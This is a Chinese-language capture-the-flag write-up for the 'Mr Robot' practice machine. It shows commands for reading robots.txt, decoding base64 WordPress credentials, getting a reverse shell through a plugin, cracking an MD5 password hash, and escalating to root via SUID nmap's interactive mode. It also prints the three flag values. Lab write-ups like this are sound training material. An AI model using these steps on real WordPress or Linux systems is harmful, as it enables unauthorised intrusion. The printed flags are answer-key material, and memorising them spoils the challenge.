Try   HackMD

Mr Robot CTF

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

題目

Mr Robot CTF

通關條件

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

提示

key 1

Robots

key 2

There's something fishy about this wordlist Why is it so long?

key 3

nmap

解題

Key 1

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
                                                                             
┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

robots.txt 是一種存放於網站根目錄下的ASCII編碼的文字檔案,它通常告訴網路搜尋引擎的漫遊器(又稱網路蜘蛛),此網站中的哪些內容是不應被搜尋引擎的漫遊器取得的,哪些是可以被漫遊器取得的。

另外還有一個字典檔 fscoity.dic 後續應該會用到

Key 2

目錄掃描後發現
/license.txt 中有一組帳號密碼 elliot:ER28-0652

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/license                

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

do you want a password or something?

ZWxsaW90OkVSMjgtMDY1Mgo=
┌──(kali㉿kali)-[~]
└─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode
elliot:ER28-0652

/wp-login.php 可以看到 wordpress 的後台登入畫面,再使用這組帳號密碼登入後台
成功登入後,安裝 wordpress reverse shell plugin 取得 shell

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

接下來尋找 key-2-of-3.txt

find / -name key-2-of-3.txt
/home/robot/key-2-of-3.txt

但這邊會發現沒辦法直接印出記事本的東西,應該是權限不足,在 /home/robot/ 的路徑下還有另一個檔案 password.raw-md5,將它印出得到 robot 的密碼雜湊,並嘗試解密獲得密碼abcdefghijklmnopqrstuvwxyz

cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

這邊之後不知道為什麼我的 shell 怪怪的,所以我找了別的 reverse shell php 並放在 404 的頁面(Wordpress的後台->Appearance->Editor),成功拿一個新的shell,並切換使用者變成 robot,成功拿到 key2

$ su - robot 
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
robot
$ cd /home/robot/
$ ls
key-2-of-3.txt  password.raw-md5
$ cat ke*
822c73956184f694993bede3eb39f959
$

Key 3

尋找可以提權的方法,發現 nmap 可以,與提示吻合

$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$

接下來透過 nmap 的 interactive 功能就可以拿到 key3 了

$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help

nmap> !cat /root/*.txt
!cat /root/*.txt
04787ddef27c3dee1ee161b21670b4e4
Last changed by 
D13
0
25

Read more

Tools

php-reverse-shell.php

Feb 3, 2025
CTF Writeups

last modified: 2024/09/30

Jan 24, 2025
Level 24 - Puzzle Wallet

Puzzle Wallet

Jan 24, 2025
Level 0 - Hello Ethernaut

Write-up of Ethernaut Level 0

Sep 25, 2024
Read more from D13
Published on HackMD